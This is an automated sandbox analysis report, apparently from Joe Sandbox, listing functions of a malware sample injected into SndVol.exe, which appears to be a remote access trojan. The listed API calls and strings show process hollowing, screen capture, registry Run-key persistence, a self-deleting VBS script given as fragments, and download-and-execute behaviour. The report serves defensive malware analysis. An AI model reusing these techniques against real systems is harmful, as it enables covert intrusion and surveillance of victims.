                                                                                                                        • Instruction Fuzzy Hash: FF61E370600305ABDB22EF65CD84B6BBBEAFF84704F444059ED09CB685EBB5E854CB91
                                                                                                                        Function 029713B7 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02966EBF: GetLastError.KERNEL32(?,00000000,02960A45,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966EC3
                                                                                                                          • Part of subcall function 02966EBF: _free.LIBCMT ref: 02966EF6
                                                                                                                          • Part of subcall function 02966EBF: SetLastError.KERNEL32(00000000,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966F37
                                                                                                                          • Part of subcall function 02966EBF: _abort.LIBCMT ref: 02966F3D
                                                                                                                          • Part of subcall function 02966EBF: _free.LIBCMT ref: 02966F1E
                                                                                                                          • Part of subcall function 02966EBF: SetLastError.KERNEL32(00000000,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966F2B
                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 029714C3
                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 0297151E
                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 0297152D
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,02963CEC,00000040,?,02963E0C,00000055,00000000,?,?,00000055,00000000), ref: 02971575
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,02963D6C,00000040), ref: 02971594
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 745075371-0
                                                                                                                        • Opcode ID: e8b871d3590c48568b704bc6c4421c70b48483840666ff9941daadca13154c91
                                                                                                                        • Instruction ID: 3b056b9e8b9d9a3f534362aa5950eb098f0403f7f152431063c79a3baca07840
                                                                                                                        • Opcode Fuzzy Hash: e8b871d3590c48568b704bc6c4421c70b48483840666ff9941daadca13154c91
                                                                                                                        • Instruction Fuzzy Hash: F0515D72A00209ABEF20DFA5CC44BBAB7BDBF48704F044579E95DEB190E7749A44CB61
                                                                                                                        Function 02927A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 02927A91
                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,02985AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02927B4A
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02927B6E
                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02927C76
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1157919129-0
                                                                                                                        • Opcode ID: 6313f19ffe05eaf3f80981d619adc17df9cee449833bb371a0533e71fcfdecad
                                                                                                                        • Instruction ID: effaf1a14fba9370f829820f98e9727ee2f077ccad48cf731417d7920edf5dd2
                                                                                                                        • Opcode Fuzzy Hash: 6313f19ffe05eaf3f80981d619adc17df9cee449833bb371a0533e71fcfdecad
                                                                                                                        • Instruction Fuzzy Hash: 745194329001189BDF14FBB4DC959EEBB7AAF94310F800159E80AA3199EF349B5DCF90
                                                                                                                        Function 0296800F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0297D478), ref: 02968079
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0299179C,000000FF,00000000,0000003F,00000000,?,?), ref: 029680F1
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,029917F0,000000FF,?,0000003F,00000000,?), ref: 0296811E
                                                                                                                        • _free.LIBCMT ref: 02968067
                                                                                                                          • Part of subcall function 02966AC5: HeapFree.KERNEL32(00000000,00000000,?,0296FA50,00000000,00000000,00000000,00000000,?,0296FCF4,00000000,00000007,00000000,?,02970205,00000000), ref: 02966ADB
                                                                                                                          • Part of subcall function 02966AC5: GetLastError.KERNEL32(00000000,?,0296FA50,00000000,00000000,00000000,00000000,?,0296FCF4,00000000,00000007,00000000,?,02970205,00000000,00000000), ref: 02966AED
                                                                                                                        • _free.LIBCMT ref: 02968233
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1286116820-0
                                                                                                                        • Opcode ID: d10f36abea7f7e28fbb26b787c576417ff205666067b3323d5b5d9ccedf70433
                                                                                                                        • Instruction ID: 84d47c7e17a53fd618706baba2acf4d9de98b4a17406a1d1e7f32b152b26e2d3
                                                                                                                        • Opcode Fuzzy Hash: d10f36abea7f7e28fbb26b787c576417ff205666067b3323d5b5d9ccedf70433
                                                                                                                        • Instruction Fuzzy Hash: D151FD71D0420AABCB10DFA9DC889FAB7FDFF84364F110A6AE46897290E7315E55CB50
                                                                                                                        Function 02926128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 02926234
                                                                                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 02926318
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DownloadExecuteFileShell
                                                                                                                        • String ID: C:\Windows\SysWOW64\SndVol.exe$open
                                                                                                                        • API String ID: 2825088817-1291576107
                                                                                                                        • Opcode ID: ff4b27fd1456990ff7d5d75375826293104bd5b079b782d179c5a13567893c50
                                                                                                                        • Instruction ID: ef6559cddcd5126d525621d3f687c9aeaa191bfc912b6de4ee5ca86d4d5e8a65
                                                                                                                        • Opcode Fuzzy Hash: ff4b27fd1456990ff7d5d75375826293104bd5b079b782d179c5a13567893c50
                                                                                                                        • Instruction Fuzzy Hash: B061333260436097DE14FA74E8649BE77AB9FC1710F41091EE88A571CDEF24DA1CCA93
                                                                                                                        Function 0293BB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0293BC6C
                                                                                                                          • Part of subcall function 029326D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 029326E1
                                                                                                                          • Part of subcall function 029326D2: RegSetValueExA.KERNELBASE(?,02986748,00000000,?,00000000,00000000,029942F8,?,?,0292E5FB,02986748,5.3.0 Pro), ref: 02932709
                                                                                                                          • Part of subcall function 029326D2: RegCloseKey.KERNELBASE(?,?,?,0292E5FB,02986748,5.3.0 Pro), ref: 02932714
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                        • API String ID: 4127273184-3576401099
                                                                                                                        • Opcode ID: 08eecf621f2b93b713da10b43defbc99f11c6f4afdde234a47730ee54eb4c65c
                                                                                                                        • Instruction ID: 0325abd066cac6052cce125294effea154e2c077407ab64cb1714e4237ff3b63
                                                                                                                        • Opcode Fuzzy Hash: 08eecf621f2b93b713da10b43defbc99f11c6f4afdde234a47730ee54eb4c65c
                                                                                                                        • Instruction Fuzzy Hash: D8119323B8021027F819313D4E3BB6E290797D6A28F8D0119E6036A6DBD9864A6503C2
                                                                                                                        Function 02970A7F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02966EBF: GetLastError.KERNEL32(?,00000000,02960A45,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966EC3
                                                                                                                          • Part of subcall function 02966EBF: _free.LIBCMT ref: 02966EF6
                                                                                                                          • Part of subcall function 02966EBF: SetLastError.KERNEL32(00000000,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966F37
                                                                                                                          • Part of subcall function 02966EBF: _abort.LIBCMT ref: 02966F3D
                                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02963CF3,?,?,?,?,0296374A,?,00000004), ref: 02970B61
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 02970BF1
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 02970BFF
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02963CF3,00000000,02963E13), ref: 02970CA2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4212172061-0
                                                                                                                        • Opcode ID: c857d0d375e147c39a20c450e9196aa35e020059314203e219c87ffce773c804
                                                                                                                        • Instruction ID: d657067f93bde948e54285f9bb60d38313adda6fe750b154d057c4ba05bc9a3e
                                                                                                                        • Opcode Fuzzy Hash: c857d0d375e147c39a20c450e9196aa35e020059314203e219c87ffce773c804
                                                                                                                        • Instruction Fuzzy Hash: 2D610C71600306AADB24AB75CC85FBBB7ADEF84714F18046AE909DB180FB74D945CB61
                                                                                                                        Function 0295A65D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0295A755
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0295A75F
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0295A76C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3906539128-0
                                                                                                                        • Opcode ID: 3df2aac1a7675dcfa71750b26e6e521ea586fc23e26f603a1c0dedda3973d1b2
                                                                                                                        • Instruction ID: 0b34be54ecc2e043db7eb307e60855d66344f6a8844c03032ca108d5adccb7f7
                                                                                                                        • Opcode Fuzzy Hash: 3df2aac1a7675dcfa71750b26e6e521ea586fc23e26f603a1c0dedda3973d1b2
                                                                                                                        • Instruction Fuzzy Hash: 6431B274D4122D9BCB21DF69D8887DDBBB8AF48310F5046EAE81CA7250E7309F958F58
                                                                                                                        Function 02937F9F Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 02937FB9
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 02937FC4
                                                                                                                          • Part of subcall function 02938452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 02938482
                                                                                                                        • CreateCompatibleBitmap.GDI32(?,00000000), ref: 02938045
                                                                                                                        • DeleteDC.GDI32(?), ref: 0293805D
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 02938060
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0293806B
                                                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 02938093
                                                                                                                        • GetIconInfo.USER32(?,?), ref: 029380CB
                                                                                                                        • DeleteObject.GDI32(?), ref: 029380FA
                                                                                                                        • DeleteObject.GDI32(?), ref: 02938107
                                                                                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 02938114
                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 02938144
                                                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 02938173
                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000028), ref: 029381BC
                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 029381DF
                                                                                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 02938248
                                                                                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0293826B
                                                                                                                        • DeleteDC.GDI32(?), ref: 0293827F
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 02938282
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 02938285
                                                                                                                        • GlobalFree.KERNEL32(00CC0020), ref: 02938290
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 02938344
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 0293834B
                                                                                                                        • DeleteDC.GDI32(?), ref: 0293835B
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 02938366
                                                                                                                        • DeleteDC.GDI32(?), ref: 02938398
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 0293839B
                                                                                                                        • DeleteObject.GDI32(?), ref: 029383A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                                        • String ID: DISPLAY
                                                                                                                        • API String ID: 1765752176-865373369
                                                                                                                        • Opcode ID: 25520cd03ecb4233d6c6f69ad2a7569b18e0db701725d221828ef8029cd26931
                                                                                                                        • Instruction ID: 83401ea2aced4b790e44a1abf07a2e16d2a467f18db24f41e8c7481fb40467d6
                                                                                                                        • Opcode Fuzzy Hash: 25520cd03ecb4233d6c6f69ad2a7569b18e0db701725d221828ef8029cd26931
                                                                                                                        • Instruction Fuzzy Hash: DCC18D71948355AFD721DF64DC44BABBBE9FF88750F04092DF98A93250DB30A908CB62
                                                                                                                        Function 02937245 Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 290libraryloaderthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0293728C
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0293728F
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 029372A0
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 029372A3
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 029372B4
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 029372B7
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 029372C8
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 029372CB
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0293736C
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 02937384
                                                                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 0293739A
                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 029373C0
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02937440
                                                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 02937454
                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0293748B
                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02937558
                                                                                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 02937575
                                                                                                                        • ResumeThread.KERNEL32(?), ref: 02937582
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0293759A
                                                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 029375A5
                                                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 029375BF
                                                                                                                        • GetLastError.KERNEL32 ref: 029375C7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                                                                                        • API String ID: 4188446516-108836778
                                                                                                                        • Opcode ID: f030602f42a6500eac1086954f74a6a7cd17e522ff4e13ad21f2d9da7310a188
                                                                                                                        • Instruction ID: 16d797a6105b1e449680b38be8f682735a6e150f0a9e408d170ef9cf99b2db45
                                                                                                                        • Opcode Fuzzy Hash: f030602f42a6500eac1086954f74a6a7cd17e522ff4e13ad21f2d9da7310a188
                                                                                                                        • Instruction Fuzzy Hash: 28A19AB1A48305AFD7119FA5CC48BABBBEDFF88348F040829F689D2150E771E514CB61
                                                                                                                        Function 0292C28E Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 282registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02931699: TerminateProcess.KERNEL32(00000000,pth_unenc,0292E670), ref: 029316A9
                                                                                                                          • Part of subcall function 02931699: WaitForSingleObject.KERNEL32(000000FF), ref: 029316BC
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0292C38B
                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0292C39E
                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0292C3B7
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0292C3E7
                                                                                                                          • Part of subcall function 0292AFBA: TerminateThread.KERNEL32(029299A9,00000000,029942F8,pth_unenc,0292BF26,029942E0,029942F8,?,pth_unenc), ref: 0292AFC9
                                                                                                                          • Part of subcall function 0292AFBA: UnhookWindowsHookEx.USER32(029940F8), ref: 0292AFD5
                                                                                                                          • Part of subcall function 0292AFBA: TerminateThread.KERNEL32(02929993,00000000,?,pth_unenc), ref: 0292AFE3
                                                                                                                          • Part of subcall function 0293B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,02985900,00000000,00000000,0292C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0293B5CE
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,02985900,02985900,00000000), ref: 0292C632
                                                                                                                        • ExitProcess.KERNEL32 ref: 0292C63E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                        • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                        • API String ID: 1861856835-1536747724
                                                                                                                        • Opcode ID: 5957977e3942b0dd9788b5e7fabc72be07d7d97653439e84ea6bde8fabee2685
                                                                                                                        • Instruction ID: b534bc13452d44d2545195f1e29e4d000275516896a7f829c738547f81720b6f
                                                                                                                        • Opcode Fuzzy Hash: 5957977e3942b0dd9788b5e7fabc72be07d7d97653439e84ea6bde8fabee2685
                                                                                                                        • Instruction Fuzzy Hash: 8791C5316043205BD718FB24EC60ABF77DAAFD1710F44082EE48A971A9DF609D5DCE56
                                                                                                                        Function 029312B5 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 189synchronizationsleepfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,029942F8,?,00000000), ref: 029312D4
                                                                                                                        • ExitProcess.KERNEL32 ref: 0293151D
                                                                                                                          • Part of subcall function 0293265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,029942F8), ref: 02932679
                                                                                                                          • Part of subcall function 0293265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 02932692
                                                                                                                          • Part of subcall function 0293265D: RegCloseKey.ADVAPI32(00000000), ref: 0293269D
                                                                                                                          • Part of subcall function 0293B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02929F65), ref: 0293B633
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0293135B
                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,0292E154,?,?,?,?,00000000), ref: 0293136A
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 02931375
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0293137C
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 02931382
                                                                                                                          • Part of subcall function 029327D5: RegCreateKeyA.ADVAPI32(80000001,00000000,02985554), ref: 029327E3
                                                                                                                          • Part of subcall function 029327D5: RegSetValueExA.KERNELBASE(02985554,000000AF,00000000,00000004,00000001,00000004,?,?,?,0292B94C,029860E0,00000001,000000AF,02985554), ref: 029327FE
                                                                                                                          • Part of subcall function 029327D5: RegCloseKey.ADVAPI32(02985554,?,?,?,0292B94C,029860E0,00000001,000000AF,02985554), ref: 02932809
                                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 029313B3
                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0293140F
                                                                                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 02931429
                                                                                                                        • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0293143B
                                                                                                                          • Part of subcall function 0293B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0293B5EB
                                                                                                                          • Part of subcall function 0293B58F: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0293B5FF
                                                                                                                          • Part of subcall function 0293B58F: CloseHandle.KERNEL32(00000000), ref: 0293B60C
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 02931483
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 029314C4
                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,0292E154,?,?,?,?,00000000), ref: 029314D9
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 029314E4
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 029314EB
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 029314F1
                                                                                                                          • Part of subcall function 0293B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,02985900,00000000,00000000,0292C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0293B5CE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                        • String ID: .exe$WDH$exepath$open$temp_
                                                                                                                        • API String ID: 4250697656-3088914985
                                                                                                                        • Opcode ID: e2dcb2e0e194311df0d2e00dd89e939ff89722b88118ac15d263a62be796c5c7
                                                                                                                        • Instruction ID: 24d6e38fa9329aecbbb3eca11b8a0ebdc5fc056f82ee04cb77e83fffb9524999
                                                                                                                        • Opcode Fuzzy Hash: e2dcb2e0e194311df0d2e00dd89e939ff89722b88118ac15d263a62be796c5c7
                                                                                                                        • Instruction Fuzzy Hash: AB51E671E443156BEF05B7A0AC48FFE736E9B84314F440555B90AA71D4DF748E4A8F90
                                                                                                                        Function 0293A1BB Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 180synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0293A2B2
                                                                                                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0293A2C6
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,02985554), ref: 0293A2EE
